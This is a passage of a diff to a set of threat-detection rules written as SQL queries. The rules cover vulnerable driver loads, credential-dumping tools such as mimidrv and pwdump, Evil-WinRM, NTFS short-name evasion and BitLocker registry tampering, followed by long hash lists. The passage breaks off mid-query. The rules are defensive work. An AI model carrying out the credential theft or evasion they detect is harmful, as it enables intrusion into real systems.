"7c676970-af4f-43c8-80af-ec9b49952852", + "title": "Use NTFS Short Name in Command Line", + "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unknown" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", - "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - WinRM Access Via Evil-WinRM", + "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "status": "test", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_hktl_evil_winrm.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", + "description": "Detects usage of winget to add new potentially suspicious download sources", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c26ab1299adcd9a385b541ef1653728270aa23e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f36a47edfacd85e0c6d4d22133dd386aee4eec15%' ESCAPE '\\' OR Hashes LIKE '%SHA1=460008b1ffd31792a6deadfa6280fb2a30c8a5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=738b7918d85e5cb4395df9e3f6fc94ddad90e939%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=558aad879b6a47d94a968f39d0a4e3a3aaef1ef1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f5696fb352a3fbd14fb1a89ad21a71776027f9ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=693a2645c28fc3b248fda95179c36c3ac64f6fc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d25340ae8e92a6d29f599fef426a2bc1b5217299%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a21c84c6bf2e21d69fa06daaf19b4cc34b589347%' ESCAPE '\\' OR Hashes LIKE '%SHA1=82ba5513c33e056c3f54152c8555abf555f3e745%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d098600152e5ee6a8238d414d2a77a34da8afaaa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=64e4ac8b9ea2f050933b7ec76a55dd04e97773b4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc1e5fd826961d93b76abd161314cb3592c4436%' ESCAPE '\\' OR Hashes LIKE '%SHA1=90a76945fd2fa45fab2b7bcfdaf6563595f94891%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b03b1996a40bfea72e4584b82f6b845c503a9748%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c771ea59f075170e952c393cfd6fc784b265027c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0918277fcdc64a9dc51c04324377b3468fa1269b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b09bcc042d60d2f4c0d08284818ed198cededa04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15df139494d2c40a645fb010908551185c27f3c5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=012db3a80faf1f7f727b538cbe5d94064e7159de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d04e5db5b6c848a29732bfd52029001f23c3da75%' ESCAPE '\\' OR Hashes LIKE '%SHA1=490109fa6739f114651f4199196c5121d1c6bdf2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d014b5edd6e19ce0e8395a64faedf49688ecb5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a87d6eac2d70a3fbc04e59412326b28001c179de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3f223581409492172a1e875f130f3485b90fbe5f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5db61d00a001fd493591dc919f69b14713889fc5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9923c8f1e565a05b3c738d283cf5c0ed61a0b90f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15d1a6a904c8409fb47a82aefa42f8c3c7d8c370%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9d07df024ec457168bf0be7e0009619f6ac4f13c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9a35ae9a1f95ce4be64adc604c80079173e4a676%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6bd965300f07012d1b651a9b8776028c45b149a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e83458c4a6383223759cd8024e60c17be4e7c85f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb3de54667548a5c9abf5d8fa47db4097fcee9f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c24dd75e4074041dbe03bf21f050c77d748b8e9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc55217b6043d819eadebd423ff07704ee103231%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e92817a8744ebc4e4fa5383cdce2b2977f01ecd4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc0e97adb756c0f30b41840a59b85218cbdd198f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d0d39e1061f30946141b6ecfa0957f8cc3ddeb63%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6d349823bbb1f5b44bae91357895dba653c5861%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f42f28d164205d9f6dab9317c9fecad54c38d5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8183a341ba6c3ce1948bf9be49ab5320e0ee324d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb1ecad3d37bb980f908bf1a912415cff32e79e6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb0d45aa6f537f5b2f90f3ad99013606eafcd162%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6053d258096bccb07cb0057d700fe05233ab1fbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=29a190727140f40cea9514a6420f5a195e36386b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a4b2c56c12799855162ca3b004b4b2078c6ecf77%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7667b72471689151e176baeba4e1cd9cd006a09a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7f7594ff084201c0d9fa2f4ef1626635b67bce5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=99201c9555e5faf6e8d82da793b148311f8aa4b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=947db58d6f36a8df9fa2a1057f3a7f653ccbc42e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d702d88b12233be9413446c445f22fda4a92a1d9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=910cb12aa49e9f35ecc4907e8304adf0dcca8cf1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=643383938d5e0d4fd30d302af3e9293a4798e392%' ESCAPE '\\' OR Hashes LIKE 